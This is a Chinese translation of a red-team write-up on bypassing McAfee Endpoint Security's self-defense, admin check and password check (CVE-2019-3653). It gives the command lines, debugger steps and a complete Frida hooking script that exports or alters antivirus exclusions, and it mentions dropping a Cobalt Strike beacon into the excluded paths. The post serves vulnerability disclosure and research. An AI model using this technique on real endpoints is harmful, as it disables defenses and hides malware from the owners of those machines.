怎样卸载迈克菲,如何禁用mcafee杀毒软件

利用Mcafee管理工具绕过McAfee杀毒软件

介绍这篇文章是关于我在一次红队活动中如何利用McAfee工具绕过McAfee Endpoint Security杀毒软件的故事。本来我没有计划写这篇文章,但当时的队友@fsdominguezand和@_dirkjan觉得此事值得被记录下来。现在,就让我们开始吧。McAfee在以往,每当我们遇到McAfee Virus Scan Enterprise(VSE)的时候,都可以通过简单地查询注册表,了解到那些位置是管理员指定的“特殊位置”(不受杀毒软件影响)。

然而,在这次任务中,事情没那么简单。因为他们使用的是McAfee Endpoint Security,从VSE时代到现在,McAfee可能认为最好不要将“特殊位置”之类的信息以明文形式存储在任何人都可阅读的文件中。

那么,我们现在该把恶意文件放在哪里?ESConfigToolMcAfee Endpoint Security杀毒软件附带一个名为ESConfigTool的程序,可用于导入和导出配置文件。它的详细用法如下。

我们发现,要从McAfee Endpoint Security得知安全设置,你需要:解锁密码管理权限很遗憾这两者我们都没有。

现在,先让我们下载一个试用版本的McAfee Endpoint Security,看看是否有入手点。

变化我们最后决定还是以ESConfigTool为目标,看看它是否有漏洞。我先创建了三个“特殊位置”:C:\Windows\Temp\*mimikatz.exeC:\TotallyLegit\

还设置了密码保护:starwars。

打开一个cmd,看看我们是否可以得到这些设置信息。

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Windows\system32>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\Export.xml /module TP /unlock starwars /plaintextCommand executed successfully. Please refer to Endpoint Security logs for detailsC:\Windows\system32>让我们打开xml文件,看看是否有敏感信息:

C:\Windows\Temp\031110**\*mimikatz.exe030110C:\TotallyLegit\031110是的,在拥有管理员权限以及输入了正确密码的情况下,你可以得到安全设置。让我们通过x64dbg软件,看一下它的整体流程。Self-defense通常使用调试软件打开二进制文件是很简单的,但由于我们面对的是安全软件,所以有一些额外的障碍。一个重要的原因是,McAfee的大部分组件都有“自卫”功能。如果你尝试使用调试软件,将立即得到一个Debugging stopped消息,McAfee对这种可疑行为极为敏感。

 

12/10/2019 12:47:09 mfeesp(2204.6392) ApBl.SP.Activity: DESKTOP-DNUK2R5\admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule “Core Protection – Protect McAfee processes from unauthorized access and termination”, and was blocked. For information about how to respond to this event, see KB85494.12/10/2019 12:47:09 mfeesp(2204.5404) ApBl.SP.Activity: DESKTOP-DNUK2R5\admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule “Core Protection – Protect McAfee processes from unauthorized access and termination”, and was blocked. For information about how to respond to this event, see KB85494.看来我们首先需要绕过这种自我防御机制。

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\admin>mkdir \tempC:\Users\admin>cd \tempC:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\blframework.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\EpSecApiLib.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\McVariantExport.dll” . 1 file(s) copied.C:\temp>copy “C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\LogLib.dll” . 1 file(s) copied.C:\temp>没错,只要像如上所述疯狂复制文件,你就可以绕过自我防御,对软件进行调试。现在,让我们开始调试吧

绕过密码检查先让我们看看当使用错误的密码时会发生什么,也许会有一些字符提示:

C:\Windows\system32>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\Export.xml /module TP /unlock startrek /plaintextThere were some errors while executing command. Please refer to Endpoint Security logs for detailsC:\Windows\system32>嗯,没什么特别的。不过McAfee的日志文件提供了更多信息:

10/12/2019 01:11:46.400 PM ESConfigTool(5476.8840) ESConfigTool.ESConfigTool.Error (ImportExportUtil.cpp:677): Failed to unlock client settings with user supplied password, TriggerAction failed让我们在调试器中搜索特定字符串,看看能否找到这个错误的来源。

 

现在我们把这个位置设为断点,再运行一次,看看在断点之前发生了什么。我们可以看到一个函数调用了一个名为BLInvokeMethod的东西,后面还跟着一个没有执行的跳转:

 

此时,我们有两个选择:进入密码检查函数,看看它是如何工作的,并尝试破解密码。直接更改检查函数的返回值。因为我很懒,我所以选择了第2项。当输入错误的密码时,密码检查函数会将错误代码放入RAX寄存器:

如果提供了正确的密码,则RAX寄存器的值为0

那么,如果我们提供了错误的密码,将密码检查函数中断,并将RAX寄存器的值改为0,会发生什么情况呢?

成功导出设置!

看来密码检查只是由工具本身完成的,不牵涉其他组件,也不需要解密。绕过管理员权限在没有管理员权限的情况下,ESConfigTool工具能使用的功能是非常有限的:

Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\user>”C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe” /export C:\temp\Export.xml /module TP /unlock starwars /plaintextDescription: Endpoint security configuration tool for exporting and importing policy configuration. User needs administrator privileges to run this utility. Utility needs password if the client interface is password protected. File supplied for import must be an encrypted file.USAGE: ESConfigTool.exe /export [/module <TP|FW|WC|ESP> ] [/unlock ] [/plaintext ] ESConfigTool.exe /import [/module <TP|FW|WC|ESP> ] [/unlock ] [/policyname ] ESConfigTool.exe /helpC:\Users\user>我们怎样才能知道权限检查的流程呢?先让我们以普通用户的身份运行调试器,看看会发生什么。发现它调用一个函数,并对返回值进行字符串比较,如果返回代码不是0,则调用“exit”。

如果追踪这个函数,会发现它将最终调用AllocateAndInitializeSid。不过这些都不值得花时间去逆向。让我们再次尝试偷懒的方法更改函数返回值。

返回值检查如下:

这一次返回值必须是0以外的任何值。

OK,又成功了!

我们现在可以从McAfee Endpoint Security导出安全设置,不需要管理权限,不需要知道正确的密码!自动运行到目前为止,一切都很顺利,但是每次使用调试器更改返回值是一件痛苦的事情。不过幸运的是,存在Frida这么一个有趣的东西,它可以帮你做所有很酷的事情,比如hook函数或改变其返回值,你不需要任何额外的技能,除了javascript!

那么我们如何将Frida注入到McAfee呢?很简单,frida-server。只需在运行McAfee的机器上启动它,然后使用Python进行连接。McAfee机器:Microsoft Windows [Version 10.0.16299.15](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\admin>cd \tempC:\temp>frida-server-12.7.9-windows-x86_64.exePython机器:Python 3.6.7 (default, Oct 22 2018, 11:32:17) [GCC 8.2.0] on linuxType “help”, “copyright”, “credits” or “license” for more information.>>> import frida>>> devmgr = frida.get_device_manager()>>> devmgr.add_remote_device(‘192.168.31.150′)Device(id=”tcp@192.168.31.150″, name=”192.168.31.150″, type=’remote’)>>> rdev = frida.get_device(‘tcp@192.168.31.150’)>>> args = [… ‘ESConfigTool.exe’,… ‘/export’,… ‘frida-export.xml’,… ‘/module’,… ‘ESP’,… ‘/unlock’,… ‘startrek’,… ‘/plaintext’… ]>>> pid = rdev.spawn(args)>>> session = rdev.attach(pid)>>> sessionSession(pid=11168)现在我们已经连接上,ESConfigTool.exe也正在运行!

现在我们可以将JS代码注入到ESConfigTool进程中。Frida脚本我不会详细介绍这个脚本的功能,其完整代码如下:

const configbase = Module.findbaseAddress(‘ESConfigTool.exe’);//const adminCheck = configbase.add(0x5240); //32const adminCheck = configbase.add(0x5f30); //64const BLInvokeMethod = Module.findExportByName(‘blframework.dll’,’BLInvokeMethod’)console.log(‘[-] base address is:’,configbase);console.log(‘[-] Admin check is:’,adminCheck);console.log(‘[-] BLInvokeMethod:’,BLInvokeMethod);Interceptor.attach(adminCheck, { onEnter: function (args) { console.log(‘[+] Hooked admin check function’); }, onLeave: function (retval) { console.log(‘[+] Returning true for admin check’); retval.replace(1); }});Interceptor.attach(BLInvokeMethod, { onEnter: function (args) { console.log(‘[+] Hooked BLInvokeMethod function’); }, onLeave: function (retval) { console.log(‘[+] Patching password check function’); retval.replace(0x0); }});这个脚本执行的正是我们在调试器中手动执行的操作,更改返回值。让我们注入脚本,看看它是否有效:

>>> script = “””… const configbase = Module.findbaseAddress(‘ESConfigTool.exe’);… //const adminCheck = configbase.add(0x5240); //32… const adminCheck = configbase.add(0x5f30); //64… const BLInvokeMethod = Module.findExportByName(‘blframework.dll’,’BLInvokeMethod’)… … console.log(‘[-] base address is:’,configbase);… console.log(‘[-] Admin check is:’,adminCheck);… console.log(‘[-] BLInvokeMethod:’,BLInvokeMethod);… … Interceptor.attach(adminCheck, {… onEnter: function (args) {… console.log(‘[+] Hooked admin check function’);… },… onLeave: function (retval) {… console.log(‘[+] Returning true for admin check’);… retval.replace(1);… }… });… … Interceptor.attach(BLInvokeMethod, {… onEnter: function (args) {… console.log(‘[+] Hooked BLInvokeMethod function’);… },… onLeave: function (retval) {… console.log(‘[+] Patching password check function’);… retval.replace(0x0);… }… });… … “””>>> session.create_script(script).load()[-] base address is: 0x7ff73ed30000[-] Admin check is: 0x7ff73ed35f30[-] BLInvokeMethod: 0x7ffa4d759730>>> rdev.resume(pid)>>> [+] Hooked admin check function[+] Returning true for admin check[+] Hooked BLInvokeMethod function[+] Patching password check function>>>最终结果如下:

虽然我是作为“admin”用户运行的,但是没有涉及UAC。相信我,这套方法也适用于普通用户。后续现在,我们就可以把一个Cobalt Strike beacon放入那些“特殊位置”。尽管在本文中只讨论了设置信息导出,但你也可以导入配置文件,添加“特殊位置”,更改其他设置,甚至完全删除密码。

值得一提的是,其实这个配置文件加密与否并不重要,因为你可以把它导入自己的McAfee软件进行查看。

McAfee在确认了漏洞后,发布了一个安全建议和相关的修复程序,漏洞被标记为CVE-2019-3653。

如果你想了解更多,可以在这里找到PoC脚本。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:https://dmaasland.github.io/posts/mcafee.html

原文:https://www.loosebyte.com/google-cloud-vulnerability/

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

本站部分内容由互联网用户自发贡献,该文观点仅代表作者本人,本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规等内容,请联系我们举报!一经查实,本站将立刻删除。

(0)

相关推荐

  • 最经典的营销案例(故事营销经典案例)

    营销智慧 营销是销售能力的体现,也是一种工作的技能,做营销是人与人之间沟通的过程,宗旨是动之以情,晓之以理,诱之以利。常用的营销技巧有引导成交法,假设成交法,关键按钮成交法,富兰克林对比法,门把成交法,软硬兼引施法。 这是营销界尽人皆知的一个寓言故事: 两家鞋业制造公司分别派出了一个业务员去开拓市场,一个叫杰克逊,一个叫板井。在同一天,他们两个人来到了南太平…

    投稿 2021-11-29
  • 华为手机哪款性价比高,华为手机性价比高的最佳选择

    华为手机再好也别盲目买,这3款才是口碑最佳的选择,可以放心入 第一款:华为P50Pro 采用的是 一块6.6英寸的OLED屏幕 ,支持120Hz刷新和300Hz触控采样率,同时支持10.7亿色的显示效果,包含1440HzPWM调光。内置4360mAh电池,支持66W有线快充以及50W无线快充。后置四摄,5000万像素的彩色主摄+4000万像素的黑白主摄+13…

    投稿 2023-05-23
  • 中国饲料排行榜,中国饲料排行榜前十名

    越通社12月23日报道,据越**关总署的统计,12月上旬,越南动物饲料和原料出口额超过8100万美元。从年初到12月中旬,动物饲料和原材料出口额首次突破10亿美元大关,达到10.49亿美元。 据报道,中国是越南动物饲料的最大出口市场。今年前11个月,越南动物饲料对华市场出口额达3.3073亿美元,占全国出口总额的34%,同比增长75.6%。越南对柬埔寨市场出…

    2022-04-22
  • 爱钱进的钱能追回来吗(爱钱进的钱能追回来吗最新消息)

    截止11月16日,爱钱进官网显示逾期率以大幅飙升,达到43.11%,累计代偿123.49亿,逾期金额85.47亿,90天以上逾期75.5亿。 爱钱进 这就意味着,在未来逾期不增加的情况,爱钱进化解这场危机,累计代偿或将超过200个亿。作为一个累计撮合成交量1047.51亿的平台,需要代偿的金额占据近2成,无论风控和经营情况其实一只脚早已踏进踩雷的泥潭里,只是…

    2021-12-26 投稿
  • 平板电脑生产厂家,2020全球平板电脑市场份额

    谈及平板电脑,数码爱好者首先想到的就是苹果的iPad产品。但最近几年,安卓平板、鸿蒙平板的用户体验都很不错,于是消费者的选择多了起来。当然,这并不能撼动苹果在这一领域的地位。 华为MatePad 11 5月1日消息,根据知名数据研究公司IDC的最新数据,在2022年Q1全球平板电脑前五名中,苹果平板电脑份额高达31.5%,仍然是当之无愧的第一;三星占比21.…

    2023-07-11
  • 电脑声音不正常,电脑突然没声音了 如何恢复正常

    Windows 11系统没有声音# 遇到这类问题首先要做的就是重启 但如果重启也无法解决该怎么办呢?   别急 我们可以根据软硬件排除法来解决这方面问题 跟着知知的讲解来一步一步操作吧       1、检查是否设置了静音   原因 电脑在使用过程中突然没有声音,首先要排查是否因为误操作按了键盘上的静音快捷键,…

    2023-07-13 投稿
  • 网上买的联通流量卡不能用(物联卡不能用于个人)

      需要注意的是,物联卡本身是不允许在个人设备(手机、平板)上使用,更不允许在一些大型电商平台上公开销售,所以,在一些电商平台上面销售的物联卡,都建议不要考虑。 为了省钱,物联卡,又是纯流量卡被很多人都在使用,但是纯流量卡没有通讯功能,还存在一定的网络安全问题,所以,如果用于手机上,还是建议大家慎之又慎。 今天,为了更好的使用物联卡,为了能够避雷那…

    2023-05-28 投稿
  • 儿童多动症核心特征,判断儿童多动症的标准

    多动症(ADHD)是一种常见的儿童神经发育障碍,其主要特征包括注意力不集中、过度活跃和冲动行为。以下是多动症孩子可能呈现的一些症状表现: 1. 注意力不集中: – 不能长时间保持对任务或活动的关注。 – 容易分心,难以专注完成学校作业或其他任务。 – 经常忘记细节,失去物品或忘记完成日常任务。 2. 过度活跃: &#821…

    投稿 2023-07-04
  • 淘宝移动流量卡(移动物联网流量卡)

    现在有些正在做私域流量的商家,在淘宝上的店铺也有一些流量,但是淘宝上的流量依然掌握在平台手里,如果没有沉淀到私域流量池,到最后花钱得来的流量也没能发挥出长期价值。 所以,商家想要实现长期的增长效果,沉淀真正的私域流量池,企业微信是个很好的平台,那么淘宝上有哪些流量呢?该如何将淘宝的流量引流到私域? 一、淘宝上流量有哪些? 1、微淘,他拥有非常庞大的流量来源,…

    2023-05-24 投稿
  • 密洛陀(密洛陀到底是什么东西)

    巴乃吊脚楼里神秘的“铁块”竟然不怕硫酸腐蚀,密洛陀真是黑毛蛇控制的傀儡吗?相信你就上当了。   由曾舜晞,肖宇梁,成方旭,哈尼克孜,刘宇宁主演,王劲松,范明特别出演的探险题材电视剧《终极笔记》已经完美收官,豆瓣评分8.0分,口碑炸裂,令人欣喜。   而剧中对于小哥在巴乃吊脚楼自己曾经的居所找到的神秘“铁块”却并没有做出交代,那么这种对于钢…

    2021-12-26 投稿
  • 郭沫若写了什么作品,郭沫若代表作品有哪些

    郭沫若,近代中国最具争议的人物。今天笔者要从另一个角度来评价郭沫若,抛开人品人格,单单从他的文学造诣上来评价郭沫若。1931年沈从文发表了名为《论郭沫若》一文,沈从文给出自己的判断,他认为: “(沈从文)在创作中诗与戏曲,与散文,与小说,几几乎皆玩一角,而且玩得不坏,这力量的强(从成绩上看),以及那词藻的美,是在我们较后一点的人看来觉得是伟大的。若是我们把每…

    2022-05-01 投稿
  • 配音接单赚钱的软件,正规配音赚钱软件

    1988年,中央人民广播电台播出有声书《平凡的世界》,直接听众超过3亿人。 2020年,现代科幻巨著《三体》有声书推出市场,1年里收听2.4亿人次。 有声书的生命力比网红更长,而且你知道在家录书可以月入2万吗?这源于“耳朵经济”兴起,音频平台都在高薪招募有声书主播!有声书主播的工作就是录制网络小说,每小时录制费100~300元。聪明的人已经开始在家录书,享受…

    2022-04-27